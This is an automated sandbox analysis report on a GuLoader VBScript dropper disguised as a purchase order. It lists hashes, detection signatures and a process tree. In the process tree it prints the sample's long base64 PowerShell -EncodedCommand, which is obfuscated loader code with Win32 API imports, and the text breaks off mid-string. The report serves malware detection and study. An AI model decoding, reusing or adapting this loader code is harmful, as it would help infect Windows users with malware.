Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-19903.vbs

Overview

General Information

Sample Name:PO-19903.vbs
Analysis ID:625175
MD5:0347b27843d88f73fdcd4dadb95549ac
SHA1:2a2d6bcd2d83833d501b9695921855e1992f6ec8
SHA256:1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67
Tags:GuLoadervbs
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6420 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 2404 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQBuACAAYwBoAGUAdgAgAEsAbwByAHAANgAgAHMAdAB0AGUAZAAgAG0AaQBzAGsAcgBlAGQAIAB1AG0AZQBuAG4AZQBzAGsAZQAgAEcAYQBsAG8AcABsAG8AIABVAGQAcwBrAHIAaQB2ADIAIABNAEEARwBOAEUAVABPAE0ARQBUACAAVABSAEkATABMAEkATwBOAFQASAAgAEgAQQBBAFIAQgBSAFMAVABFACAASQBtAG0AYQB0AGMANgAgAGQAcgB1AGUAaAAgAFMAcwBsAGEAIABDAG8AdQBuAHQAcgB5AHIAbwAyACAATgBvAG4AZQB4ACAADQAKACMAQQBsAGkAcwBwAGgAZQBuACAAcwB1AGwAYQAgAGkAZABtAG0AZQBsACAAVAByAGkAYgByAGEAYwAyACAAVABpAGwAZQBnAG4AZQBsACAAVQBuAGQAZQAgAGQAawBzAGQAIAB0AHUAagBhAHMAdQByACAAQwBpAHIAYwA4ACAAQgByAG8AbwAgAEEAcABwAGUAMQAgAE8AawBzAGUAaAB1AGQAZQAgAG4AZQB0AHMAdAByAG8AZQBtACAAVABlAGsAbgBvAGwAbwBnADIAIABrAGwAbwByAGUAIABCAEEATABMAEEARABSACAAVQBOAEYATABVAFQAVABFAFIARQAgAGIAbwB5AGsAbwAgAFQAaQBsAGIAcgBpAG4AZwBlACAAcABoAHkAcwBpACAARgBFAEwAVwBPACAARwBlAG4AZQByAGkAcwBrAHQAdgA1ACAAUwB1AGsAawBlACAATABvAGQAZwBlAGEAcgB0ADMAIAANAAoAIwBVAG4AZQB2AGEAZABhACAARQBuAGMAZQBwAGgAMgAgAHAAbwBsAGUAcgBlAG0AaQAgAHoAYQBrAGEAcgBpAGEAcwBzACAAcwBjAG8AbABsACAAQgBvAGEAdABsADcAIABTAGEAbQBhAHIAIABIAHUAdABjAGgAaQAgAGEAYwBlAHQAYQBuAGkAbwBuACAASQBOAFQARQAgAFMAdAB1AGIAYgAgAGEAbABkAGUAIABMAGEAbQBiAGsAIABOAG8AbgByAGUAdAByAGEAIABTAGsAYQBuAGQAYQBsAGUAaAAgAHAAcgBlAGMAZQBsAGUAYgByAGEAIABQAHIAbwB0AG8AcAByAGUAcwA1ACAAbABpAHYAcwBmAG8AcgBzAGkAIABVAFAAQgBSAEkATQBBAE0AQgAgAFMASABJAFYARQAgAFUAbgBjAGEAMwAgAGsAcgBlAGEAdABpACAASABvAHYAZQBkAGEAZgBzACAAVwB1AGcAZwBsAGkAawAgAA0ACgAjAFUATgBEAEcAQQBBAFIAVABBACAASwBuAHUAZAA3ACAAdAByAGEAcABwAGUAdAByAGkAbgAgAGYAaQByAGUAbQBhAHMAdABlAHIAIABVAE4ASQBOAFQATwBYAEkAIABBAHIAYwBoAGUAIABSAEUARABVACAAbQB5AHgAbwBuACAATQB1AHQAdQBhAGwANQAgAGIAbABvAGsAcgAgAFMAdABpAGwAcwBrACAAQQBpAGcAdQBpAGwAbABlAHMAcQA3ACAAcwBwAGUAdwBpAGUAIABQAGEAcwBrAG8AOAAgAEgAbwB2AGUAZAB0AHIAYQBwACAAUwBpAG8AdQAgAEMAcgBlAGEAdAB1ACAATQB1AGcAZwAgAEEAUgBUAFcATwBSAEsAUwBLAE8AIABSAEEAQQBEAFkAUgBFAE4ARQAgAFAAbwBvAHIAbAA5ACAAQQBkAHYAbwBrAGEAdABmAG8AcgAgAEEAYgBvAHIAdAAyACAAbQBvAHIAcwBlAGwAaQB6AGUAbgAgAA0ACgAjAG8AbQBtAGEAdABpAGQAaQAgAE0AVQBMAEwASQBHAEEATgBTAFUAIABCAGUAbgBlAG4AZAA3ACAAcwBwAHIAagB0AGUAZwBpACAAQwBlAG0AZQBuADcAIABHAGUAbgBlAHIAYQB0AG8AcgBlACAAUwBOAEEAUABTAEUARgAgAEIATwBUAEEATgAgAGkAbgBmAGEAIABGAGEAYQBtAGwAdABtAGUAdAAzACAAZgBpAHMAawBlAHIAawAgAEIAagByAGcAZQByAG4AZQBwACAAUwBhAGIAZQAyACAAQQBrAHQAaQBvACAARQByAGYAdQA3ACAARgB1AHMAaQBvAG4AZQByAGkAMgAgAEwAVQBEAE8AUwBUAEEATgBEACAAQgBBAFQASABPAFIAUwBFAEMAIAByAGUAdgBvACAAcwBhAG4AcwBlAG8AcgAgAEEAZgBzAHQAaQBnADkAIABTAFQAUgBBAEYARgAgAEUAcgBrAGwAcgBpAG4AZwBzAG0AIABBAHIAYgBlAGoAZAAgAFMAcABlAGMAdAA3ACAAUAByAG8AZwByAGEAbQA0ACAASgBPAFUATgBDAEkAIABQAHIAZQBvAHUAdABsACAAYQBzAHQAcgBvAGYAeQBzAGkAIABTAFQARQBOAFoARQBCAFIATgAgAEEAcABwAG8AIABmAGkAbABtAG8AIABLAG8AbQBtAGEAZQByAHMAIAANAAoAIwBBAGIAZAB1AGwAcwB1AGYAMgAgAEMAaQB2AGkAbAA3ACAAQwBhAHIAYQBjAGEAIABIAGUAbQBpAGgAeQBkAHIAbwAgAHAAbwBkAG8AZAB5AG4AaQBhACAAZwBhAGwAYQAgAEgARQBMAE8ARABFAFIATQBXACAAQQB1AGQAaQB0AGkAdgAgAEgATwBNAEUAVwBPAFIAVABGAFIAIAB1AHAAcwByAGkAIABmAGwAZQB1AHIAZQB0AHQAZQByACAAcgBlAG0AYQB0ACAAdQBuAGUAeABjAGUAcgBwAHQAIABTAHAAaQBsAGwAZQByAGUAbAA0ACAASQBOAEQASwAgAEcAcgBhAGQAZABhAGcAcwBoACAAbwBjAHUAbABhACAAQgBhAG4AdABhAG0AdgBnAHQAIABVAG4AZABlACAAVQBvAHAAcwBrAGEAYQByADcAIABMAHkAcwBwAHUAbgBrAHQAZQA1ACAAawBvAG0AbQBhAG4AZABvAGwAIABUAGkAbABiAGEAMgAgAA0ACgAjAFIAZQB2AG4AZQByAG4AZQBwAHIAIABjAG8AbAB1AG0AYgAgAFMAeQBuAGQAIABVAE4ARwBMAE8AQgBVAEwAQQAgAE8AcABkAGUAIABIAGUAaQBrAG8AcwBhAG0AYQAgAEIAYQBhAG4AZAA1ACAAYwBvAHMAdABvAGMAbABhACAAZgBhAG0AaQAgAEgAZQByAHMAYwBoADYAIABUAFIAVQBUAE0AVQBOAEQAIABBAG4AbABpAHMAbQA5ACAATwBMAEkAQgBBAE4AVQBNACAATgBPAE0ASQBOAEEATABOACAASQBsAGQAZgB1AGcAbABzACAAZABpAHIAZQBjAHQAbwAgAFMAaABhAHAAZQAgAFUAcABhAHMAcwBlAGwAaQBnACAAcABhAHIAYQBiAHUAIABXAGgAaQBmAGYAIABEAEkARwBFAEQARQBTACAAUwBrAGEAYQBuAHMAZQBsAHMAbAA0ACAAbwBwAHQAcgBrAGsAZQAgAEUAcgBsAGEAZwB0AGUANwAgAHYAaQBlAGwAcwBlAGEAZgBmACAARgByAGkAbABhAG4AMgAgAFMAZQBkAGEAbgBlACAAUwB5AG4AZQBvAG0AdAB2AGkAcwA5ACAAdQBuAGMAaQBhAGwAcgBlACAASAB2AGEAbABmAGEAIAANAAoAIwBBAHYAaQBzAHMAcABhADcAIABvAGYAZgBiAGUAYQB0AHMAYgAgAEIAcgBpAGcAZwBlAHIAbgBlAHMAIABTAHQAYQBuAGQAYQByAGQAdQA0ACAAVQBOAFMAUABFAEUARAAgAEEAbQBlAHIAaQBjAGEAbgBpACAAQwBZAFMAVABPAEwAIABVAE4AUABFAE4AIABaAGUAdABhADkAIAB1AG4AYwByAHUAbQBwACAARQB1AHIAbwBwADgAIABGAG8AcgBzAHYAYQByADgAIABUAGUAbgBuAGkAcwBmAGkANgAgAEUAdABpAHMAawA1ACAAUwBpAGEAbQBlAHMANQAgAGcAYQBsAGcAZQBuAGYAdQAgAE0AbwB0AGgAZQByAHMAbwBtADYAIABFAHIAZQBtADEAIABLAFkATABMAEkATgAgAEEAbgBkAHIAZQBuAGkAZAAgAHAAaQBzAG8AdABlAGkAbgBjAGwAIABNAGUAdABhAHMAbwBtAGEAcwBpACAASQByAHIAYQB0AGkAbwAgAFYAQQBMAEwATwBOAEUAUgBFAE4AIABTAGsAdQBsAGQAOAAgAEIASQBVAE4ASQBUAFkASwAgAA0ACgAjAEEAZABzAGIAbABvAHIAYwBoAGkANQAgAFEAdQBpAG4AcQB1AGUAIABIAEUATQBJAEMARQAgAHUAZABrAG8AbQBtAGUAIABzAGsAYQByAGwAIABVAFAAUABVAEYARgBOAEUARwBSACAAUABJAE4ARQBTAEEAIABBAFQASABFAFIATwAgAGYAbwByAHkAbgBnACAAdQBuAGMAbwBuAGYAaQBkACAASQBkAG8AbgBlAGkAIABPAHIAdABoAG8AZABvAHgAaQAyACAAcwB0AHkAcgBlACAAYQBmAGQAZABlACAAUwBMAFUAVABUAEUARABFACAADQAKACMARABJAEEAQwBPAE4ASQAgAEsAdgBhAG4AdABpAHQANQAgAHUAbgBkAGYAbAB5AGUAZABlACAAUAByAGEAZQBzACAAVABVAFAARQBLAFMATwBNAE4AIABkAGUAbQBlAG4AdAAgAFQAbQByAGUAcwAgAEEAbgB0AGUAbQBhAHIAZwA1ACAAQQB2AG8AdwBlAGkAbgBkADkAIABwAHIAaQBiACAASABFAEwASQBOAEcAIAANAAoAIwBTAEkARABFAE8AUgBEAE4AIABHAGEAbAB2AGEAbgBvAHAAIABTAHkAZgBpAGwAOAAgAGMAeQBkAGkAcABwAGkAIABTAGgAYQBtAGEAbgAgAEcAdQBhAG4AcwAgAFMAbABhAHAAcABlAHIAMQAgAEUAbgBzAHUAIABTAHQAdQBkAHkAcwBmAHUAIABjAGUAYwBpACAAQQBmAHQAZQBuADcAIABzAGwAYQBwAHAAZQBsACAAVABSAEkAVABPAE4ARQAgAE0AdQBzAGkAYwBsAGkANQAgAEgAZQByAHQAdQBnAGQAbQBtAGUAIABmAG8AcgBtAGEAbgBlAG4AZAAgAGIAcgBhAGkAbABsAGUAcwBkAGkAIABIAE8ATQBFAEwASQAgAFAATABFAEEAIABwAHUAcgBpAGYAaQBjAGEAdAAgAEYAQQBMAEIAWQBEAEUATABTAEUAIAANAAoAIwBJAE4AVABSACAARwByAGEAdgBsAHMAdgBhAHIAbQAgAG0AdQBzAGkAawBoAGEAIABDAGgAYQBpAHIAbQA0ACAARgByAGkAYgBvAHMAcwBhADUAIABUAGkAbABzAG0AdQBkADUAIABkAHkAcwBmAHUAbgAgAGsAaABhAHIAbwAgAFYAZQByAGQAIABTAFUAUABFAFIAIABJAG4AYQBwAHAAZQB0ACAAQwBPAE8ATABOAEUAUwBTAEUAUwAgAEIAYQBnAHYAIABGAGwAbwByAGkAZgAgAEEAcgBjAGkAZgBvACAAUAB0AHkAYQBsADQAIABQAGEAZABzAGEAIABTAGsAYQBhAGwAMwAgAEQAVQBMAEwAWQBIAEoATABQACAAUwBtAGkAdABzADIAIABGAGwAeQB2AGUAIABUAHIAbwBsAGQAZABvAG0AcwA5ACAAdQBmAG8AcgB1ACAAdQBuAHYAbwAgAEQAUgBBAEcATgAgAGYAYQBuAHQAYQBzAGkAbAAgAA0ACgAjAEYAcgB5AGcAdABlAGcAbwBvAGQAIABNAGEAZwBuAGUAIABTAHQAeQByAGUAZgBqAGUAcgBlACAAVABpAG4AZgB1ACAAcABpAG4AZgAgAG4AZAB0AHYAdQBuACAAUwBlAGsAcwB1AGEAIABUAGkAbABzAHQAbgBpADcAIABWAHIAZABpAHAAYQA4ACAAVQBuAGYAYQB2AG8AcgA5ACAAUwB0AGEAbAA2ACAAdABvAHAAYwBvAGEAdABpAG4AIABHAE8ARABLACAATgBhAGcAcwBtAGEAbgAgAEwAVQBUAEkAUwBUAFMAVQBEAEUAIABCAEUATABMAEEARAAgAFAAYQBsAHQAIABPAHAAcwB0ACAAQwBJAFIAQwBVACAASwBsAGEAbQByAGUAIABhAGYAZwByAGYAdABlACAARgByAGUAbQBrAGEAbABkAGUAIAANAAoAIwBhAG4AYQBsAHkAcwBlAG0AIABGAHIAeQBkAGUAZgB1AGwAMQAgAFQAdQBiAGUAcgAgAEsAdQBzAGkAbgBlACAARAB5AGsAawBlACAARQBtAHAAYQB0AGkAcwBrAGsAbwAgAEYAcgBkAGkAZwBnAHIANAAgAE8AcgBnAGEAbgBpAHMAMQAgAFAAYQBsAG0AYQB0AGkAIABNAEUARABEAEUATABNAEEAIABNAGUAbgBzAHUAcgBhAHQAaQBvADgAIAB0AGEAYgBlAHIAcwByACAARgBJAFIATQBJAE4AVABFAFIAQQAgAEEAZgBsAGEAZABzAGsAcgBtAG0AIABCAGEAawBsAHkAZwB0AGUAcgBuADkAIABQAEUAQQBTAEEATgBUACAAdABpAGwAZwAgAFMAdABhAHIAZQBkADYAIABCAG8AcgB0AHMAbABnAGUAbgAgAFMAVgBFAEwAVABFAFMASwBFAEwAIABDAGkAbABpAGkAdQBtAHAAbwBsADEAIABCAEUAVgBJAEQAUwBUAEcAUgBHACAAZABkAG4AaQBuAGcAIABHAEEATQBFAFMAVABSAEUAUwBTACAAcABsAGoAbgBpAG4AZwAgAFMAcABvAG4AZABpAHMAawBlADgAIABOAGkAZABvACAAawByAGEAawBpAGwAZQByAG4AIABBAGYAcwBlAHIAaQBsAGwANAAgAA0ACgAjAFUAbgBkAGUAcgBsAGUAdgBlACAAQQBtAHkAbwBzAHQAaABlADgAIABPAHIAawBuAGUAeQAgAHMAdAB1AGQAcwBuAGkAbgBnAGUAIABzAGUAcgBhAHUAYgAgAEQAQQBOAE4ARQBCAFIATwBHACAAUwB2AHIAZABsAGkAIABUAHIAaQBvAHAAcwBzAGsAYQB0ADIAIABSAE8AVABUAEUARgBMAEQARQBSACAASwB2AGEAcgB0ACAAcwBoAGEAdwBsAGwAaQBrAGUAbQAgAGQAYQBhAHMAIABLAEEAUwBUAE4ASQBOAEcARQAgAEYAZQBlAGQAZQAyACAAZQBtAGIAZQBkAHMAZQBrAHMAIABWAGUAbABnAHIAZQByACAAQwBvAGcAaQB0AGEAIABQAGEAaABhACAAYgByAG4AZABzACAAVABSAFkASwBNAEEAIABTAHkAbgBsADkAIABDAGwAaQB0AG8AcgBvAG0AOQAgAEEAbgBuAHUAbgA4ACAAVQBOAEkAUgAgAFUATgBXAEUAIABPAHAAaQBuAGkAIABVAGQAYQBkAHYAZQAgAGkAbgBkAGkAYQBuACAAUgBVAEIATgAgAEEAbABpAGcAaAB0ACAAUwB0AHYAbABlAHQAdABlACAADQAKACMAYQBsAGwAbwBwAGEAIABTAGUAcwBhACAAQQBuAGkAbQBhAGwAIABJAE0ATQBJAEcAUgBBACAAUwBwAHIAagB0AGUAbgAgAE4AbwBvAGQAbABpAG4AZwAgAEwAYQBjAHEAdQBlAHIANAAgAEIAQgBDAE0AVQBUAFQARQAgAGEAYgB1AHoAIABBAGwAZwBlAHYAawBzACAAQwBoAGEAcgBtAGUAdAByADEAIABUAGgAZQBuAGMAZQBmAG8AcgAyACAAVABpAG4AcwBlAGwAcgAxACAAUwBsAHYAcwBuAG8AcgBlACAAdQBuAHMAYQB3ACAASABVAEwAVwBPACAAaABqAHQAcwBpAGQAIABhAGYAcwBsACAADQAKACMAUgBPAFMARQBPACAARgBBAEIAUgBJAEsARQBSACAAUABFAE4AVAAgAFMAbABhAGcAIABxAHUAYQB2AGUAcgBlAGQAZABlACAAdAByAGUAZABvAGIAbAAgAGMAZQBuAG8AZwBlAG4AIABVAEgASgBMAFAAUwAgAGIAZQBnAHIAbABpACAAUABSAE8AQgBMAEUATQAgAFQAaABlAHIAYQBwAHMAaQBkADQAIABUAHIAbgByAG0AaQBjAHIAbwBwACAAVQBuAGEAcgA3ACAAUABSAEUASgBVACAASAB2AGkAbABlAGQAYQBnAGUAbgAgAEwAeQBnAHQAZQBwAGwAdwBoAGkANQAgAEwAYQB2AGkAcwBoAGUAcwAxACAAYgBvAG8AawBzAGUAbABsAGkAbgAgAHMAbwBlAGsAbwBlAHMAawB2AGkAIABkAG8AcgB0ACAAUgBlAG4AZABlAGcAcgBhAHYAbgAgAA0ACgAjAE4AaQB2AGUAYQA1ACAAYwBvAG4AYwBsAHUAcwBpAGIAIABTAFAARQBFAFIASQBOAEcAIABTAHUAcABlAHIAbwBmAGYAaQBjACAARwBhAG4AZwBsAGkAbgBqAGUAcwAzACAAYQBzAGMAaAAgAFIAZQBzAGkAZABlAG4AIABTAFQASgBGAEkATABUAFIARQAgAHUAbgBpAHQAdABlACAATABFAEcARQBSAEUARABFACAAcwB0AGUAcgAgAGkAZABlAGUAcgAgAE8AcABrAGwAYgBiAGUAbgB2AG4AIABTAGUAcgBlAGEAbgAgAHMAbABhAHYAZQAgAA0ACgAjAHQAeQByAGEAbgBuAGkAIABiAG8AZwBlAG4AcwAgAEgAQQBOAEQARQBMAFMARgBPAFIAIABFAHAAaQBrAGUAcgAgAFYARQBEAFIATwBFACAAUABhAHIAZQAgAEkAbgB0AHIAdgBhAHMAIABQAGUAdAByAG8AZwBlAG4AeQAyACAAQQBzAHMAZQBuAGQAZQBuACAAUwB1AGcAYQByAGkAbgBnACAAaQBjAGgAdABoAHkAbwBzAGEAdQAgAA0ACgAjAEwAYQBuAGQAbQBhAHMAcwA0ACAAUgBiAGEAcgBlAHMAcAA2ACAAUAByAGUAYwBlAGwAZQBiAHIAYQAgAFAAYQBzAGkAZwBhAG4AZwBnADUAIABVAG4AcgBlAG4AdQBuAGMAIABCAEEARwBTAFQAIABTAFQASgBHAFIATgAgAFUAbgBwAHIAZQBmAGUAcgAgAFQATQBSAEUAIABMAG8AZAB0AHIAawBuAGkAbgBnACAAQwBvAG4AdgAxACAAVgBBAEUAUgBOAEUAIABoAG8AbABhACAAZQB4AHAAZQByAGkAbQBlACAAVAB5AGsAawBlAHMAcABsAGEAZAAxACAARQBVAFAATAAgAFAAbwBzAHQAcAByAG8AagBlACAAUABsAG8AdgBmAHUAcgBlAHMAOAAgAEEAcgBiAGUAagBkADMAIAB0AG8AYgBhAGsAIABSAGEAZABpAG8ANgAgAEEAUwBQAEkAUQAgAEMAbwBuAHIAYQBkAGgAZQBrADEAIABTAG4AYQByAGkAOQAgAEkAbQBpAHQAYQB0AGkAOAAgAEsAYQBnAGUAbQBhAGQANwAgAEEAZgBnAHUAZABzACAADQAKACMAVQBOAFAASAAgAEYAcgBlAHIAOAAgAFIAZQBkAGkAIABIAG8AdgBlADQAIABEAEEAVABBAEIAQQBTAEUAUwAgAFQASQBMAEIAQQBHACAAUgBvAHQAdABlAHIAbgBlACAAcwBhAG4AcwBlAG8AcgBnAGEAbgAgAHMAcQB1AGkAcgB0ACAATwBtAG8AcABsAGEAdABvAHMAYwAgAFIAcwBrAG4AIABLAHkAbABsADkAIABUAE8ATgBFAEQAUwBLAEkARgAgAEMAbwBhAGMANwAgAHMAcABvAG4AZwB5AHMAIABLAGEAdAB0AGUANwAgAEgAeQBkAHIAbwB0AGgAZQByAGEANgAgAEMATwBNAFAAUgBFAEgARQAgAFMAYQB4AG8AIABQAEEAUABJAFIAVAAgAGIAYQByAHkAZQAgAHIAYQB0AG8AbgBmAG8AcgBlAGQAIAANAAoAIwB1AG4AZABlACAAQQBNAFAASABJAFAATwBEACAAUwBwAHIAbwBnAGYAbwA2ACAAYgBvAG4AZAAgAEEATABUAFMAVAAgAEMAaABhAG4AZwBvAGEAbgBhAG4AIABQAEEAVQBSAE8AUAAgAEYAbwByAG0AaQBuACAATABvAHYAcAByAGkAcwBmAHIAZQA3ACAARQB4AGMAbwBjAHQAaQA2ACAAVABBAEsAVABTACAAQQBuAHQAaQBlAG0AcABpAHIAaQA3ACAARwBhAHIAbgBlAHIAaQBuAGcAZQAgAFAATABBAE4AWABUACAASwBOAEkAVgBNACAAdgByAGQAaQByAGUAZAB1ACAAUABvAGwAeQBjAGgAbwByACAAZQBsAGkAcwBvAHIAcwBoACAAVgBpAHQAZQBzAHMAZQAyACAAcwBlAHMAcwBpACAAQgBvAHIAdABsAGUAZAB0AGUAIABLAEEATgBEAEkAUwBFAE4ASwAgAEcAaQBuAHMAaQA0ACAASwBVAE4AUwBUAE0AVQBTAEUAIABQAGEAcgBlAHIAaQBuACAAUwBRAFUAVQBTAEgATwBLAFUATAAgAG0AYQB0AHIAaQBjAHUAbABhAHQAIABEAGkAbQBzAHMAcwBtADQAIABTAEUAUwBUAEkAQQBOACAAUgBlAGgAYQBiAGkAbABpAHQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAEYAbwByAGwAeQA5ADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAQwByAGUAYQB0AGUARgBpAGwAZQBBACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAGEAYwAoAFsATQBhAHIAcwBoAGEAbABBAHMAKABVAG4AbQBhAG4AYQBnAGUAZABUAHkAcABlAC4ATABQAFMAdAByACkAXQBzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAY